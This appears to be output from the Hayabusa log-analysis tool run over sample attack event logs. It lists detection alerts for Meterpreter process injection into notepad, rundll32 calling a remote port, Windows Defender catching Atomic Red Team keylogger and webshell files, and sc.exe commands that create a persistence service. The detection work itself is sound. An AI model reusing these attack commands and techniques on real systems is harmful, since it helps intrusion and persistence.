+2019-07-03 20:39:30.129 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_sysmon/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:31.707 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-18 20:40:00.730 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:40:16.396 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:41:16.418 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:41:17.508 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:41:48.236 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:51:50.798 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 14:42:51.446 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:42:53.295 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:43:03.303 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:43:03.303 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:43:46.623 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.161 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.185 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.185 +00:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.268 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.288 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.307 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.150 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.176 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.176 +00:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation_sysmon/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.253 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.278 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.351 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 